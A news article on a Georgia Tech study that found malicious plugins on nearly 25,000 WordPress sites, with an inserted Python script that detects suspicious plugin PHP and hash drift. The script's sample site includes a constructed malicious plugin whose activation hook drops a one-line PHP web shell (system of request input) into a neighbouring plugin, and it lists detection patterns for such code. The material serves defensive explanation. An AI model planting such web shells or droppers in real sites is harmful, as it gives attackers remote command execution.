A new study by Georgia Tech researchers found malicious plugins installed on nearly 25,000 WordPress websites.
Researchers analyzed over 400,000 web server backups using a tool named ‘YODA’ and found 47,337 malicious plugins on 24,931 unique WordPress sites. Every compromised website in the dataset had two or more infected plugins, and 94% of the malicious plugins were still active.
The researchers were also able to use YODA to trace the malware carried by these plugins back to its source, the Georgia Tech College of Computing reported on August 26. Attackers injected the malware by exploiting vulnerabilities, most often infecting WordPress sites after plugins had been added to the installation.
In some cases, malicious plugins were found masquerading as harmless plugins offered through legitimate marketplaces.
Malicious plugins were also found to spread by attacking other plugins on the same server where WordPress is installed. The most common infection routes were cross-plugin infection and exploitation of existing vulnerabilities.
Malicious plugins can cause real damage, but site owners can recover by purging the malicious plugins and reinstalling clean versions that have been scanned for vulnerabilities.
Cory Cline, senior cybersecurity consultant at application security provider nVisium LLC, told SiliconANGLE: “This is easy because all WordPress plugins are written in PHP and the source code is freely available for review by anyone who wishes.”
Cline added that installing a WordPress plugin that has not been properly vetted may have no impact if the plugin is non-malicious and does not contain any known vulnerabilities. “However, a malicious WordPress plugin could end up taking over the affected WordPress instance completely,” he said.
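The two remediation signals the article mentions, source review (plugins are plain PHP, so their code can be read) and checking installed files against a clean copy before purging and reinstalling, can be scripted. The following is an added example written for this page, not code from the Georgia Tech study, YODA, nVisium or WordPress. It triages a wp-content/plugins tree in two ways: it flags PHP constructs a reviewer would look at first (eval of a decoded payload, request-controlled function calls, shell execution of request input, and writes into WP_PLUGIN_DIR, which is how one plugin infects another), and it diffs file hashes against a baseline taken from a known-clean state, which catches the cross-plugin infection case where a benign plugin is modified after install. The pattern list, the three sample plugins and the simulated infection are all constructed for the example; a real baseline would come from the plugin's release archive rather than from the site itself.

```python
import hashlib
import os
import re
import tempfile

# Hypothetical reviewer patterns over PHP source (not YODA's rules, which the
# article does not describe). Label -> regex.
SUSPICIOUS_PATTERNS = {
    # eval() fed by a decoder: the usual obfuscated payload loader
    "eval_decoded_payload": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # $_GET['f']($_GET['a']): the function to call is chosen by the request
    "request_controlled_call": re.compile(
        r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),
    # shell execution of request-controlled input
    "shell_exec_of_request": re.compile(
        r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I),
    # writing into the plugins directory: how one plugin infects another
    "writes_into_plugin_dir": re.compile(r"\bfile_put_contents\s*\(\s*WP_PLUGIN_DIR\b", re.I),
}


def scan_php_source(source: str) -> list[str]:
    """Labels of every suspicious pattern present in one PHP file, sorted."""
    return sorted(name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(source))


def _php_files(plugins_dir: str):
    """Yield (relative path with '/' separators, absolute path) for each .php file."""
    for root, _dirs, files in os.walk(plugins_dir):
        for fname in sorted(files):
            if fname.endswith(".php"):
                full = os.path.join(root, fname)
                yield os.path.relpath(full, plugins_dir).replace(os.sep, "/"), full


def build_baseline(plugins_dir: str) -> dict[str, str]:
    """SHA-256 of every PHP file, keyed by relative path, taken from a clean state."""
    baseline = {}
    for rel, full in _php_files(plugins_dir):
        with open(full, "rb") as fh:
            baseline[rel] = hashlib.sha256(fh.read()).hexdigest()
    return baseline


def scan_plugins_dir(plugins_dir: str, baseline: dict[str, str]) -> dict[str, dict]:
    """Per plugin slug: pattern hits per file, files whose hash drifted from the
    baseline, and files the baseline never saw (dropped-in backdoors)."""
    report = {}
    for rel, full in _php_files(plugins_dir):
        slug = rel.split("/", 1)[0]
        entry = report.setdefault(slug, {"findings": {}, "drifted": [], "new_files": []})
        with open(full, "rb") as fh:
            data = fh.read()
        hits = scan_php_source(data.decode("utf-8", errors="replace"))
        if hits:
            entry["findings"][rel] = hits
        if rel not in baseline:
            entry["new_files"].append(rel)
        elif baseline[rel] != hashlib.sha256(data).hexdigest():
            entry["drifted"].append(rel)
    return report


def plugins_to_purge(report: dict[str, dict]) -> list[str]:
    """Slugs with any hit, drift or unexpected file: remove and reinstall clean."""
    return sorted(s for s, e in report.items() if e["findings"] or e["drifted"] or e["new_files"])


# --- Constructed sample site; none of this is real plugin code --------------
CLEAN_PLUGIN = """<?php
/* Plugin Name: Hello Clean (constructed sample) */
add_action('init', function () { register_post_type('note'); });
"""
CONTACT_FORM = """<?php
/* Plugin Name: Contact Form (constructed sample) */
add_shortcode('cf', function () { return '<form>...</form>'; });
"""
# Harmless-looking header, obfuscated loader, and an activation hook that
# drops a backdoor into a neighbouring plugin (cross-plugin infection).
MALICIOUS_PLUGIN = """<?php
/* Plugin Name: SEO Booster (constructed sample) */
register_activation_hook(__FILE__, function () {
    $dropper = '<?php if (isset($_REQUEST["c"])) { system($_REQUEST["c"]); }';
    file_put_contents(WP_PLUGIN_DIR . '/contact-form/inc/cache.php', $dropper);
});
eval(base64_decode('ZWNobyAiaGkiOw=='));
"""


def make_sample_site() -> str:
    """Write the three constructed plugins into a temporary plugins directory."""
    root = tempfile.mkdtemp(prefix="wp-plugins-")
    for rel, body in (("hello-clean/hello-clean.php", CLEAN_PLUGIN),
                      ("contact-form/contact-form.php", CONTACT_FORM),
                      ("seo-booster/seo-booster.php", MALICIOUS_PLUGIN)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root


def simulate_cross_plugin_infection(plugins_dir: str) -> None:
    """Do on disk what seo-booster's activation hook would do at runtime."""
    inc = os.path.join(plugins_dir, "contact-form", "inc")
    os.makedirs(inc, exist_ok=True)
    with open(os.path.join(inc, "cache.php"), "w") as fh:
        fh.write('<?php if (isset($_REQUEST["c"])) { system($_REQUEST["c"]); }\n')
    with open(os.path.join(plugins_dir, "contact-form", "contact-form.php"), "a") as fh:
        fh.write("include __DIR__ . '/inc/cache.php';\n")


def demo() -> tuple[dict[str, dict], list[str]]:
    site = make_sample_site()
    baseline = build_baseline(site)        # taken before the infection lands
    simulate_cross_plugin_infection(site)
    report = scan_plugins_dir(site, baseline)
    return report, plugins_to_purge(report)


if __name__ == "__main__":
    report, purge = demo()
    for slug in sorted(report):
        print(slug, report[slug])
    print("purge and reinstall:", purge)
```

Note what each signal catches: seo-booster was malicious from the start, so it never drifts from the baseline and only the source patterns flag it; contact-form is clean code that was modified after install, so only the hash comparison flags its main file and the dropped cache.php (which the pattern scan then also catches). Pattern matching alone misses the first kind of tampering and checksums alone miss the second, which is why both are run.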
Sounil Yu, Chief Information Security Officer at JupiterOne Inc., a cyber asset management and governance solutions provider, noted that this is not just a WordPress issue but a software problem affecting any plugin, integration, or third-party application (PITA) that builds on a host platform.
“PITA research is problematic because there are thousands of these PITAs without clear provenance, test results, or data flow diagrams,” Yu explains. “The security team has taken a rudimentary approach, mostly just skimming. And marketplaces need to do more due diligence.”